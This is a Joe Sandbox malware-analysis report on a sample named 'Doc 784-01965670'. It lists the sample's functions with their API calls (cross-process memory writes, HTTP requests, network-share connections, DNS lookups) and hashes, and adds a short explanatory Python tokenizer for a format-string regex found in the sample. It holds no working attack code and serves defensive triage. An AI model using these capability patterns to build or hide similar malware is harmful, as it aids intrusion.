• Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
• Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
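The string referenced at 00469C37 above is a regular expression for printf-style format directives: it matches a backslash escape (`\\`, `\n`, `\r`, `\t`), a literal `%%`, or `%` followed by at most one flag, an optional width (digits or `*`), an optional precision (`.digits` or `.*`), an optional `h`/`l`/`L` length modifier and one conversion from `diouxXeEfgGs`. Note that `%c`, `%p` and `%n` are deliberately outside the conversion class. The block below is an added example, not code from the sample or from Joe Sandbox: it applies that exact regex to a constructed format string so an analyst can see which tokens the sample's formatter would consume and how many arguments it expects. The function and variable names are the author's own.

```python
import re

# The format-directive regex exactly as recovered from the sample's .text dump
# (string at 00469C37). Python's re dialect accepts it unchanged.
FORMAT_DIRECTIVE_RE = re.compile(
    r'\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]'
)


def tokenize_format(fmt):
    """Split a format string into (kind, text) tuples.

    kind is one of:
      'escape'    - a backslash escape such as \\n or \\t (two literal characters)
      'percent'   - a literal '%%'
      'directive' - an argument-consuming conversion such as %-10s or %5.2f
      'literal'   - everything the regex does not match
    """
    tokens = []
    pos = 0
    for m in FORMAT_DIRECTIVE_RE.finditer(fmt):
        if m.start() > pos:
            tokens.append(('literal', fmt[pos:m.start()]))
        tok = m.group(0)
        if tok.startswith('\\'):
            kind = 'escape'
        elif tok == '%%':
            kind = 'percent'
        else:
            kind = 'directive'
        tokens.append((kind, tok))
        pos = m.end()
    if pos < len(fmt):
        tokens.append(('literal', fmt[pos:]))
    return tokens


def count_conversions(fmt):
    """Number of arguments the formatter would pull for fmt.

    Each directive consumes one argument; a '*' in the width or precision
    field consumes one more each (the regex allows both).
    """
    total = 0
    for kind, tok in tokenize_format(fmt):
        if kind == 'directive':
            total += 1 + tok.count('*')
    return total


if __name__ == '__main__':
    # Constructed sample input; not a string taken from the sample.
    sample = 'Name: %-10s Value: %5.2f %% done\\n'
    for kind, tok in tokenize_format(sample):
        print(f'{kind:9} {tok!r}')
    print('arguments consumed:', count_conversions(sample))
```

Because `%c` is not in the conversion class, `tokenize_format('%c')` returns it as a single literal; anything the formatter leaves untouched shows up that way, which is a quick way to spot directives that a given runtime silently ignores.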
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                                                                    • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Variant$ClearCopyInit_malloc
                                                                                                                                    • String ID: 4RH
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                                      • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                                    • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                                                                    • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                                                                    • String ID: LPT$HH
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                                                                      • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                                                                    • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                                                                    • String ID: @
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CrackInternet_memset_wcslen
                                                                                                                                    • String ID: |
                                                                                                                                    APIs
                                                                                                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                                                                    • HttpQueryInfoW.WININET ref: 0044A892
                                                                                                                                      • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                                                                    • String ID:
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    APIs
                                                                                                                                    • LoadLibraryA.KERNEL32(?), ref: 00437CB2
                                                                                                                                    • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00437D26
                                                                                                                                    • FreeLibrary.KERNEL32(?,?,AU3_GetPluginDetails), ref: 00437D3D
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Library$AddressFreeLoadProc
                                                                                                                                    • String ID: AU3_GetPluginDetails
                                                                                                                                    APIs
                                                                                                                                    • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                                                                    Strings
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DestroyWindow
                                                                                                                                    • String ID: msctls_updown32
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                                                                    • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$MoveWindow
                                                                                                                                    • String ID: Listbox
                                                                                                                                    • API String ID: 3315199576-2633736733
                                                                                                                                    • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                    • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                                                                    • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                                                                    • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 2507767853-2761332787
                                                                                                                                    • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                    • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                                                                    • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                                                                    • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                                                                    APIs
                                                                                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                                                                    • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorMode$InformationVolume
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 2507767853-2761332787
                                                                                                                                    • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                    • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                                                                    • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                                                                    • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                                                                    APIs
                                                                                                                                    • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                                                                    • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                                                                    • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID: msctls_trackbar32
                                                                                                                                    • API String ID: 3850602802-1010561917
                                                                                                                                    • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                    • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                                                                    • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                                                                    • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                                                                    • gethostbyname.WSOCK32(?), ref: 0046BD78
                                                                                                                                    • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                                                                    • inet_ntoa.WSOCK32(00000000), ref: 0046BDCD
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                                                                    • String ID: HH
                                                                                                                                    • API String ID: 1515696956-2761332787
                                                                                                                                    • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                    • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                                                                    • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                                                                    • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                                    • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                                                                    • DrawMenuBar.USER32 ref: 00449828
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$InfoItem$Draw_malloc
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 772068139-4108050209
                                                                                                                                    • Opcode ID: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                                    • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                                                                    • Opcode Fuzzy Hash: 80c8cc45c3a2388c5d5a2fad2fa293faafe293b1266d5f5cdbd09ec66a21ca10
                                                                                                                                    • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocTask_wcslen
                                                                                                                                    • String ID: hkG
                                                                                                                                    • API String ID: 2651040394-3610518997
                                                                                                                                    • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                    • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                                                                    • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                                                                    • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
APIs
• LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
• GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: GetSystemWow64DirectoryW$kernel32.dll
• API String ID: 2574300362-1816364905
• Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
• Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
• Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
• Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,00000000,?,?,00000101,?,?), ref: 004343DE
• GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpSendEcho
• API String ID: 2574300362-58917771
• Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
• Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
• Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
• Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
• GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCloseHandle
• API String ID: 2574300362-3530519716
• Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
• Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
• Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
APIs
• LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
• GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: ICMP.DLL$IcmpCreateFile
• API String ID: 2574300362-275556492
• Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
• Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
• Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
APIs
• LoadLibraryA.KERNEL32(kernel32.dll,0040E551,?), ref: 0040EE7B
• GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 0040EE8D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: AddressLibraryLoadProc
• String ID: IsWow64Process$kernel32.dll
• API String ID: 2574300362-3024904723
• Opcode ID: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
• Instruction ID: 75875fa2f3f8b89ed4c8cde0d061cde3839b728dd3838c322d7dfd2ddbff31fa
• Opcode Fuzzy Hash: 16a412f97595c511ed2c9e877c1bae7dd0f808d0cf5b3a9fdd28adcf59ee176d
• Instruction Fuzzy Hash: 51D0C9B0940707DAC7301F72C91871B7AE4AB40342F204C3EB995A1290DBBCC0408B28
APIs
Memory Dump Source
• Source File: 00000000.00000002.2061979740.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2061965369.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062030409.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062046963.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2062084175.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Doc 784-01965670.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
• Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
• Opcode Fuzzy Hash: 864e75c6b64c8395072179653f2e6e54ed688e1196af63861ce1262d91a289fa
• Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
APIs
• __flush.LIBCMT ref: 00414630
• __fileno.LIBCMT ref: 00414650
• __locking.LIBCMT ref: 00414657
• __flsbuf.LIBCMT ref: 00414682
  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
Memory Dump Source
